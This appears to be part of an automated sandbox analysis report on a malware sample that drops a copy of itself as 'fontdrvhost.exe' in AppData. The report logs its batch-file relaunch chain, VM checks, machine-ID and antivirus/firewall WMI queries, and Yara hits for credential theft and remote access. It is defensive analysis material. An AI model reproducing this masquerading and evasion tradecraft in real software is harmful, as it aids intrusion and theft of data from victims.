Source: fontdrvhost.exe, 00000008.00000002.1701655922.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2103740621.000000001BD11000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000021.00000002.1974264152.00000269B5D97000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000028.00000002.2060434590.0000025FD088F000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2394390360.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000039.00000002.2290310341.0000024AEDA09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: fontdrvhost.exe, 00000033.00000002.2716698642.000000001C591000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Users\user\Desktop\ZT3pxe2Tb4.exe VolumeInformation
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF70000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1745557106.000000001B0DC000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1998188991.000000001B3E9000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2653167450.000000001B950000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2103426522.0000000001896000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2494300205.000000001B141000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED